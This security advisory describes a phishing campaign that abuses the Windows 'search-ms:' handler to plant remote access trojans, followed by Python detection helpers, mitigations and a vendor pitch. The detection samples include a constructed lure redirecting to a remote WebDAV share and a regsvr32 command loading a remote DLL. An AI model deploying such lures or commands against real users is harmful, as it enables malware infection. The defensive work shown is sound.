Hackers Abusing Windows Search Feature to Install Remote Access Trojans
Unknown threat actors are abusing a legitimate Windows search feature to fetch arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The technique relies on the "search-ms:" URI protocol handler and the "search:" application protocol, which let a web page or document open Windows Explorer with a search scoped to a location of the caller's choosing. Attackers lure users to websites where JavaScript on the page triggers a "search-ms:" URI whose search scope is an attacker-controlled remote share. The same trick has been carried over to HTML attachments, which widens the attack surface: the observed campaigns use deceptive emails that embed either hyperlinks or HTML attachments containing a URL that redirects the user to a compromised website.
Clicking the link prompts the browser with an "Open Windows Explorer?" dialog. If the user approves, "the search results of remotely hosted malicious shortcut files are displayed in Windows Explorer disguised as PDFs or other trusted icons, just like local search results," the researchers explained. The only trust cue the victim sees is the familiar Explorer window; nothing indicates that the listed files live on a remote share. Should the victim open one of the shortcut files, it executes a rogue dynamic-link library (DLL) through the regsvr32.exe utility. The infection chain ends with the installation of AsyncRAT or Remcos RAT, giving the threat actors remote control of the host, the ability to steal sensitive information, and access that can be resold to other threat actors.
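The two points in this chain that a defender can check mechanically are the search URI in the lure (does its search scope point at a remote host?) and the final regsvr32 invocation (is it loading a DLL from a UNC path?). The following is an added example written for this page, not code from the original article or its researchers. It assumes the standard search-ms: parameter layout (query=, crumb=location:..., displayname=) and treats any crumb or subquery value that names a UNC path (\\host\share, with the host@80 / host@SSL form the Windows WebDAV client uses) as remote; the sample HTML, process-creation lines, IP address and share names are constructed for the example.

```python
"""Detection helpers for the search-ms:/search: URI abuse described above.

Added example, not code from the original article. The URI layout
(search-ms:query=...&crumb=location:\\host\share&displayname=...) is the
standard search-ms parameter form; the sample HTML, log lines, IP address
and share names below are constructed for this example.
"""
import re
from urllib.parse import unquote

# search-ms: or search: URIs as they appear in HTML attributes or JavaScript strings.
SEARCH_URI_RE = re.compile(r'(?i)\b(search-ms|search):[^"\'\s<>]+')
# UNC path. Two or more backslashes so that a JavaScript-escaped "\\\\host\\share"
# and a raw \\host\share both match; host@80 / host@SSL is WebDAV client syntax.
UNC_RE = re.compile(r'\\{2,}([^\\/&]+)\\')


def find_search_uris(text):
    """Return every search-ms:/search: URI found in text, percent-decoded."""
    return [unquote(m.group(0)) for m in SEARCH_URI_RE.finditer(text)]


def parse_search_uri(uri):
    """Split a URI into (scheme, [(key, value), ...]); keys may repeat (several crumb= parts)."""
    scheme, _, body = uri.partition(':')
    params = []
    for part in body.split('&'):
        key, _, value = part.partition('=')
        params.append((key.lower(), value))
    return scheme.lower(), params


def remote_hosts(uri):
    """Hosts the URI points Explorer at via crumb=location:\\host\share or subquery=\\host\..."""
    _, params = parse_search_uri(uri)
    hosts = []
    for key, value in params:
        if key in ('crumb', 'subquery'):
            m = UNC_RE.search(value)
            if m:
                hosts.append(m.group(1))
    return hosts


def assess_html(html):
    """One finding per search URI in an HTML page or attachment.

    A URI whose search scope is a remote host is the attack pattern from the
    article: Explorer renders that share's shortcut files as if they were
    local search results. A local scope (e.g. C:\\Users\\Public) is benign.
    """
    findings = []
    for uri in find_search_uris(html):
        scheme, params = parse_search_uri(uri)
        hosts = remote_hosts(uri)
        display = next((v for k, v in params if k == 'displayname'), '')
        findings.append({
            'uri': uri,
            'scheme': scheme,
            'displayname': display,
            'remote_hosts': hosts,
            'verdict': 'malicious' if hosts else 'local',
        })
    return findings


# Final stage from the article: a shortcut on the share runs regsvr32 against a remote DLL.
REGSVR32_UNC_RE = re.compile(r'(?i)regsvr32(\.exe)?\b[^\r\n]*?(\\\\[^\s"\']+)')


def suspicious_regsvr32(command_line):
    """Return the UNC path when regsvr32 is told to load a DLL from a remote share, else None."""
    m = REGSVR32_UNC_RE.search(command_line)
    return m.group(2) if m else None


# Constructed samples (not from the article): a lure page and two process-creation lines.
SAMPLE_HTML = r'''
<script>
  window.location.href = "search-ms:query=Invoice&crumb=location:\\\\203.0.113.5@80\\invoices&displayname=Downloads";
</script>
<a href="search-ms:query=report&crumb=location:C:%5CUsers%5CPublic&displayname=Documents">local</a>
'''
SAMPLE_PROCESS_LINES = [
    r'CommandLine: regsvr32.exe /s \\203.0.113.5@80\invoices\invoice.dll',
    r'CommandLine: regsvr32.exe /s C:\Windows\System32\wuapi.dll',
]

if __name__ == '__main__':
    for f in assess_html(SAMPLE_HTML):
        print(f['verdict'], f['scheme'], repr(f['displayname']), f['remote_hosts'])
    for line in SAMPLE_PROCESS_LINES:
        print(suspicious_regsvr32(line) or 'ok', '<-', line)
```

Run against a mail gateway's HTML attachments or a proxy's page captures, the first half flags the lure before any user interaction; the second half is the endpoint-side check, run over process-creation telemetry (Sysmon event 1 or equivalent), and catches the chain even if the lure was never seen. The displayname value is worth recording in alerts: it is what the victim saw as the window title.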
Relevance
Phishing and Malware Campaigns
Mitigation
Avoid clicking on suspicious URLs or downloading HTML files from unknown sources
Avoid untrustworthy links: hover before clicking, inspect the URL, and do not take the clickbait. A link or attachment that opens a "search-ms:" or "search:" URI, or a browser prompt asking to "Open Windows Explorer?", is a red flag in email or web content
Where the "search-ms:" and "search:" handlers are not needed, consider disabling them (they are registered under HKEY_CLASSES_ROOT\search-ms and HKEY_CLASSES_ROOT\search); test the change first, since it also affects legitimate saved searches and search links
Enhance cybersecurity training for your team on how to spot potentially suspicious phishing campaigns
Incident Response
Isolate and quarantine any infected systems from the network
Notify relevant parties according to your Incident Response Plan
Reach out to cybersecurity professionals to help contain the attack, analyze the risk, and devise a recovery plan.
References
1. The Hacker News. (2023, July 28). Hackers Abusing Windows Search Feature to Install Remote Access Trojans. https://thehackernews.com/2023/07/hackers-abusing-windows-search-feature.html
How can CyberForce|Q services help you address this risk?
Partner with CyberForce|Q to mitigate the risk of phishing and malware campaigns. Our cutting-edge Security Operations Center is purpose-built to tackle the challenge of monitoring phishing attempts 24x7x365. By leveraging our services, we can help minimize the risk associated with phishing and malware campaigns with measurable results.